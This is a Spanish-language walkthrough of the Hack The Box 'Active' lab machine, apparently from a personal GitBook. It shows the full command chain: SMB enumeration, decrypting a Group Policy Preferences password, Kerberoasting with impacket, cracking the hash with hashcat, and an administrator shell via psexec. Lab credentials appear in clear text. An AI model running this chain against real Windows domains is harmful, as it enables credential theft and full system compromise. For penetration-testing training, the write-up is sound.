🛰️
Config-17 Space
  • 1️⃣Introducción
  • 👨‍💻¿Quien soy?
  • 👨‍🎓Recomendaciones de cursos y formación
  • 🤖Máquinas
    • 📦Hack The Box
      • 👨‍🏫Introducción a HTB
      • 🐧HTB Linux
        • Easy
          • 🏳️Irked
          • 🏳️Squashed
          • 🏳️OpenAdmin
          • 🏳️Late
          • 🏳️Teacher
        • Medium
          • 🏁Investigation
          • 🏁BroScience
      • 🪟HTB Windows
        • Easy
          • 🏳️Bastion
          • 🏳️Artic
          • 🏳️Active
          • 🏳️Optimum
          • 🏳️Granny
          • 🏳️Grandpa
          • 🏳️Devel
        • Medium
          • 🏁Fuse
          • 🏁Jeeves
      • ♨️HTB Other OS
        • 🏁Schooled
    • 💻Máquinas Locales
      • 🥷Metasploitable 2
      • 🐝Bee Box bWAPP
      • 🕸️DVWA
Con tecnología de GitBook
En esta página
  • 1. Enumeración y descubrimiento
  • 2. Escalada de privilegios

¿Te fue útil?

  1. Máquinas
  2. Hack The Box
  3. HTB Windows
  4. Easy

Active

AnteriorArticSiguienteOptimum

Última actualización hace 2 años

¿Te fue útil?

Datos
Notas

Nombre de la máquina:

IP de la máquina:

10.10.10.100

Sistema simulado:

Windows Server

Servicio vulnerado:

smb

CVEs:

1. Enumeración y descubrimiento

Comenzamos el ejercicio realizando un reconocimiento con NMAP a todos los puertos de la máquina Artic.

nmap -sC -sV -sT 10.10.10.100 -p-

Nos intentamos conectar mediante smb y listamos que directorios existen en el smb.

En este punto nos intentamos conectar en el directorio Replication que es el que nos llama la atención del smb al no ser habitual.

Vamos buscando dentro de los directorios y nos encontramos el fichero Groups.xml el cual nos descargamos mediante get Groups.xml

Vemos el contenido del fichero Groups el cual vamos a intentar desencriptar la contraseña. 

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties acti>
</Groups>

Utilizamos gpp-decryp y conseguimos la contraseña del usuario SVC_TGS

En este punto vamos a intentar acceder a los diferentes directorios con esa contraseña. Para ir algo más rápido vamos a automatizar mediante crackmapexec.

crackmapexec smb 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18 --shares

En este punto accedemos y podemos ver la flag del usuario.

2. Escalada de privilegios

En este punto tenemos que investigar como realizar la escalada de privilegios en el sistema. 

impacket-GetUserSPNs -request active.htb/SVC_TGS:GPPstillStandingStrong2k18

Guardamos el hash en un fichero al cual aplicaremos fuerza bruta mediante el diccionario rockyou.txt con hashcat onteniendo la contraseña Ticketmaster1968.

hashcat -m 13100 -a 0 /root/2 /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt --force

Volvemos a utilizar crackmapexec para probar con los diferentes direcrotios del smb esta vez como el usuario administrador.

crackmapexec smb 10.10.10.100 -u Administrator -p Ticketmaster1968

Con esto tendríamos acceso como root a la máquina y podriamos conectarnos a la misma y obtener acceso a la flag. 

impacket-psexec WORKGROUP/Administrator:Ticketmaster1968@active.htbsh

Vamos a realizar un kerneroasting attack mediante con nuestras credenciales obtenidas para el usuario SVC_TGS y así obtendremos un hash de administrador.

Si te he ayudado sígueme y apóyame en

🤖
📦
🪟
🏳️
impacket-GetUserSPNs
Hack The Box
Activve